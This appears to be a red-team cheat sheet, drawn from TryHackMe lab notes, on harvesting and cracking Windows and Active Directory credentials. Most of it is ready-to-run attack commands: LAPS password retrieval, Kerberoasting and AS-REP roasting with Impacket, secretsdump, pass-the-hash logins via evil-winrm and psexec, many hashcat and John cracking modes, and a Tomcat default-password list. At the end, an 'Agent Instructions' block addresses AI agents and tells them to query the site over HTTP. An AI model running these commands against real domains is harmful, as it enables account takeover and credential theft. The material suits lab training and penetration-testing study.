Once we obtained hashes, we can either use the hash for a specific user to impersonate him or crack the hash using Cracking tools, such `hashcat`. We can use the hashcat `-m 1000` mode to crack the Windows NTLM hashes as follows: **Kali** ``` hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt --show ```
## Domain Controller - Local Administrator Password Solution (LAPS) This task discusses how to enumerate and obtain a local administrator password within the Active Directory environment if a LAPS feature is configured and enabled. ### Group Policy Preferences (GPP) **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) A Windows OS has a built-in Administrator account which can be accessed using a password. Changing passwords in a large Windows environment with many computers is challenging. Therefore, Microsoft implemented a method to change local administrator accounts across workstations using Group Policy Preferences (GPP). GPP is a tool that allows administrators to create domain policies with embedded credentials. Once the GPP is deployed, different XML files are created in the SYSVOL folder. SYSVOL is an essential component of Active Directory and creates a shared directory on an NTFS volume that all authenticated domain users can access with reading permission. The issue was the GPP relevant XML files contained a password encrypted using AES-256 bit encryption. At that time, the encryption was good enough until Microsoft somehow published its private key on [MSDN](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN). Since Domain users can read the content of the SYSVOL folder, it becomes easy to decrypt the stored passwords. One of the tools to crack the SYSVOL encrypted password is [Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1). ### Local Administrator Password Solution (LAPS) **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) In 2015, Microsoft removed storing the encrypted password in the SYSVOL folder. It introduced the Local Administrator Password Solution (LAPS), which offers a much more secure approach to remotely managing the local administrator password. The new method includes two new attributes (ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime) of computer objects in the Active Directory. The `ms-mcs-AdmPwd` attribute contains a clear-text password of the local administrator, while the `ms-mcs-AdmPwdExpirationTime` contains the expiration time to reset the password. LAPS uses `admpwd.dll` to change the local administrator password and update the value of `ms-mcs-AdmPwd`.
### Enumerate for LAPS **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) The provided VM has the LAPS enabled, so let's start enumerating it. First, we check if LAPS is installed in the target machine, which can be done by checking the `admpwd.dll` path. **Victim(cmd)** ``` dir "C:\Program Files\LAPS\CSE" ```
The output confirms that we have LAPS on the machine. Let's check the available commands to use for AdmPwd cmdlets as follows, **Victim(cmd)** ``` powershell Get-Command *AdmPwd* ```
Next, we need to find which AD organizational unit (OU) has the "All extended rights" attribute that deals with LAPS. We will be using the "Find-AdmPwdExtendedRights" cmdlet to provide the right OU. Note that getting the available OUs could be done in the enumeration step. Our OU target in this example is THMorg. You can use the -Identity \* argument to list all available OUs. **Victim(cmd)** ``` Find-AdmPwdExtendedRights -Identity THMorg ```
The output shows that the `THMGroupReader` group in `THMorg` has the right access to LAPS. Let's check the group and its members. **Victim(powershell)** ``` net groups "LAPsReader" ```
**Victim(powershell)** ``` net user bk-admin ```
### Getting the Password **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) We found that the bk-admin user is a member of THMGroupReader, so in order to get the LAPS password, we need to compromise or impersonate the bk-admin user. After compromising the right user, we can get the LAPS password using Get-AdmPwdPassword cmdlet by providing the target machine with LAPS enabled. **Victim(powershell)** ``` Get-AdmPwdPassword -ComputerName creds-harvestin ```
It is important to note that in a real-world AD environment, the LAPS is enabled on specific machines only. Thus, you need to enumerate and find the right target computer as well as the right user account to be able to get the LAPS password. There are many scripts to help with this, but we included the [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) PowerShell script in `C:\Tool`to try it out. ## Domain Controller Other Attacks In the previous tasks, the assumption is that we already had initial access to a system and were trying to obtain credentials from memory or various files within the Windows operating system. In other scenarios, it is possible to perform attacks in a victim network to obtain credentials. This task will briefly introduce some of the Windows and AD attacks that can be used to obtain the hashes. Before diving into more AD attack details, we suggest being familiar with [Kerberos protocol](https://en.wikipedia.org/wiki/Kerberos_\(protocol\)) and New Technology LAN Manager (NTLM), a suite of security protocols used to authenticate users. ### Kerberoasting **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) Kerberoasting is a common AD attack to obtain AD tickets that helps with persistence. In order for this attack to work, an adversary must have access to SPN (Service Principal Name) accounts such as IIS User, MSSQL, etc. The Kerberoasting attack involves requesting a Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS). This attack's end goal is to enable privilege escalation and lateral network movement. For more details about the attack, you can visit the THM [Persisting AD](https://tryhackme.com/room/persistingad) room (Task 3). Let's do a quick demo about the attack. First, we need to find an SPN account(s), and then we can send a request to get a TGS ticket. We will perform the Kerberoasting attack from the AttackBox using the GetUserSPNs.py python script. Remember to use the THM.red/thm account with Passw0rd! as a password. **Kali** ``` python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip $VICTIM $DOMAIN/$USERNAME Password: $PASSWORD ```
The previous command is straightforward: we provide the Domain Controller IP address and the domain name\username. Then the GetUserSPNs script asks for the user's password to retrieve the required information. The output revealed that we have an SPN account, svc-user. Once we find the SPN user, we can send a single request to get a TGS ticket for the srv-user user using the -request-user argument. **Kali** ``` python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip $VICTIM $DOMAIN/$USERNAME -request-user $OTHERUSER Password: $PASSWORD ```
Now, it is a matter of cracking the obtained TGS ticket using the HashCat tool using `-m 13100` mode as follows, **Kali** ``` hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt --show ```
Try replicating the steps against the attached VM by finding the SPN user and then performing the Kerberoasting attack. Once you have obtained the ticket, crack it and answer the question below. ### AS-REP Roasting **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) AS-REP Roasting is the technique that enables the attacker to retrieve password hashes for AD users whose account options have been set to "Do not require Kerberos pre-authentication". This option relies on the old Kerberos authentication protocol, which allows authentication without a password. Once we obtain the hashes, we can try to crack it offline, and finally, if it is crackable, we got a password!
The attached VM has one of the AD users configured with the "Do not require Kerberos preauthentication" setting. Before performing the AS-REP Roasting, we need a list of domain accounts that should be gathered from the enumeration step. In our case, we created a `users.lst` list in the tmp directory. The following is the content of our list, which should be gathered during the enumeration process. **users.lst** ``` Administrator admin thm test sshd victim CREDS-HARVESTIN$ ``` We will be using the Impacket Get-NPUsers script this time as follows, **Kali** ``` python3.9 /opt/impacket/examples/GetNPUsers.py -dc-ip $VICTIM $DOMAIN/ -usersfile users.lst ```
We specified the IP address of the domain controller with the `-dc-ip` argument and provided a list of domain users to check against. Once the tool finds the right user with no preauthentication configuration, it will generate the ticket. Various cybersecurity and hacking tools also allow cracking the TGTs harvested from Active Directory, including Rubeus and Hashcat. Impacket GetNPUsers has the option to export tickets as John or hashcat format using the `-format` argument. ### SMB Relay Attack **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) The SMB Relay attack abuses the NTLM authentication mechanism (NTLM challenge-response protocol). The attacker performs a Man-in-the-Middle attack to monitor and capture SMB packets and extract hashes. For this attack to work, the SMB signing must be disabled. SMB signing is a security check for integrity and ensures the communication is between trusted sources. We suggest checking the THM[ Exploiting AD](https://tryhackme.com/room/exploitingad) room for more information about the SMB relay attack. ### LLMNR/NBNS Poisoning **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) help local network machines to find the right machine if DNS fails. For example, suppose a machine within the network tries to communicate with no existing DNS record (DNS fails to resolve). In that case, the machine sends multicast messages to all network machines asking for the correct address via LLMNR or NBT-NS. The NBNS/LLMNR Poisoning occurs when an attacker spoofs an authoritative source on the network and responds to the Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) traffic to the requested host with host identification service. If you want to learn more about the attack, we suggest checking THM [Breaching AD](https://tryhackme.com/room/breachingad) room. The end goal for SMB relay and LLMNR/NBNS Poisoning attacks is to capture authentication NTLM hashes for a victim, which helps obtain access to the victim's account or machine. ### Secretdump **Example** [Red Team Capstone Challenge](/red-team/walkthroughs/tryhackme/red-team-capstone-challenge.md) #### Get Hashes You will need a username and password of another user. Some users can get more usernames and hashes than others. **Kali** ``` L/usr/local/bin/secretsdump.py $DOMAIN/USERNAME:'$PASSWORD'@DC-IP ``` ## Login with hashes ### Evil-WinRM **Example** [Red Team Capstone Challenge](/red-team/walkthroughs/tryhackme/red-team-capstone-challenge.md) **Kali** ``` evil-winrm -u $USERNAME -H $HASH -i $VICTIM ``` ### PSexec **Example** [Red Team Capstone Challenge](/red-team/walkthroughs/tryhackme/red-team-capstone-challenge.md) **Kali** ``` /usr/local/bin/psexec.py $USERNAME@$VICTIM -hashes $HASH:$HASH ``` ## Hashes First identify the hash with one of the HASH analyzers. ### Hex to Binary This isn't really a hash but it looks like a MD5 hash at first sigh so worth trying. #### Examples [biteme](/red-team/walkthroughs/tryhackme/biteme.md#finding-username) **Kali** ``` echo $HEXSTRING| xxd -r -p ``` ### Crack MD4 hash #### Examples [Crack the hash](/red-team/walkthroughs/tryhackme/crack-the-hash.md) **Kali** ``` john --format=raw-md4 hash.txt --wordlist=password ``` ### Crack MD5 hash #### Examples [John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md) **Kali** ``` john --format=raw-md5 hash.txt ``` ### Crack MD5(Wordpress) hash #### Examples [Wordpress: CVE-2021-29447](/red-team/walkthroughs/tryhackme/wordpress-cve-2021-29447.md) **Kali** ``` john --format=phpass-opencl hash.txt john --format=phpass-opencl hash.txt --show ``` ### Crack SHA-1 hash #### Examples [John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md)[Crack the hash](/red-team/walkthroughs/tryhackme/crack-the-hash.md) **Kali** ``` john --format=raw-sha1 hash.txt ``` ### Crack HMAC-SHA1 hash #### Examples [Crack the hash](/red-team/walkthroughs/tryhackme/crack-the-hash.md) **Kali** ``` hashcat -m 160 hash.txt /usr/share/wordlists/rockyou.txt hashcat -m 160 hash.txt --show ``` ### Crack SHA-256 #### Examples [Game Zone](/red-team/walkthroughs/tryhackme/game-zone.md) [John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md)[Crack the hash](/red-team/walkthroughs/tryhackme/crack-the-hash.md) **Kali** ``` john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-SHA256 ``` ### Crack SHA-512 #### Examples [Overpass 2 - Hacked](/red-team/walkthroughs/tryhackme/overpass-2-hacked.md)[John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md)[Linux PrivEsc](/red-team/walkthroughs/tryhackme/linux-privesc.md) **Kali** ``` john --format=raw-sha512 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` **Kali** ``` hashcat -m 1710 -w /usr/share/wordlists/rockyou.txt hash.txt hashcat -m 1710 hash.txt --show ``` ### Crack SHA-512 crypt **Examples** [Crack the hash](/red-team/walkthroughs/tryhackme/crack-the-hash.md) **Salt:** aReallyHardSalt
**hash.txt** The hash is already in the hash so didn't change anything.
**Kali** 
john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using hashcat **Examples** [The Cod Caper](/red-team/walkthroughs/tryhackme/the-cod-caper.md) **Kali** ``` hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt --show ``` ### Crack BCrypt #### Examples [Daily Bugle](/red-team/walkthroughs/tryhackme/daily-bugle.md) [Crack the hash](/red-team/walkthroughs/tryhackme/crack-the-hash.md) **Kali** ``` john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt ``` ### Crack Whirlpool #### Examples [John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md) **Kali** ``` john --format=whirlpool hash.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` ### Crack NT hash #### Examples [Blue](/red-team/walkthroughs/tryhackme/blue.md) **Kali** ``` john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt ``` ### Crack NTLM #### Examples [John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md)[Post-Exploitation Basics](/red-team/walkthroughs/tryhackme/post-exploitation-basics.md) **Kali** ``` john --format=nt ntlm.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` **Kali** ``` hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show ``` ### Crack NetNTLMv2 #### Examples [Breaching Active Directory](/red-team/walkthroughs/tryhackme/breaching-active-directory.md) **Kali** ``` hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --show ``` ### Crack Kerberos 5, etype 23, TGS-REP #### Examples [Attacking Kerberos](/red-team/walkthroughs/tryhackme/attacking-kerberos.md)[Post-Exploitation Basics](/red-team/walkthroughs/tryhackme/post-exploitation-basics.md) **Kali** ``` hashcat -m 13100 -a 0 hash.txt Pass.txt hashcat -m 13100 -a 0 hash.txt Pass.txt --show ``` ### Crack Kerberos 5, etype 23, AS-REP #### Examples [Attacking Kerberos](/red-team/walkthroughs/tryhackme/attacking-kerberos.md) **Kali** ``` hashcat -m 18200 hash.txt Pass.txt hashcat -m 18200 hash.txt Pass.txt --show ``` ### Crack Apache Hash #### Examples [Cyborg](/red-team/walkthroughs/tryhackme/cyborg.md)[Dav](/red-team/walkthroughs/tryhackme/dav.md) **Kali** ``` hashcat -m 1600 password /usr/share/wordlists/rockyou.txt hashcat -m 1600 password --show ``` ### Crack GOST R 34.11-94 #### Examples [Easy Peasy](/red-team/walkthroughs/tryhackme/easy-peasy.md) **Kali** ``` john --wordlist=easypeasy.txt --format=GOST hash.txt ``` ## Common Passwords #### Examples [Thompson](/red-team/walkthroughs/tryhackme/thompson.md) **Tomcat default passwords** ``` password Password1 password1 admin tomcat tomcat manager role1 tomcat changethis Password1 changethis password password1 r00t root toor tomcat s3cret password1 password admin changethis ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/methodologies-and-resources/cheat-sheets/credential-gathering-and-cracking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.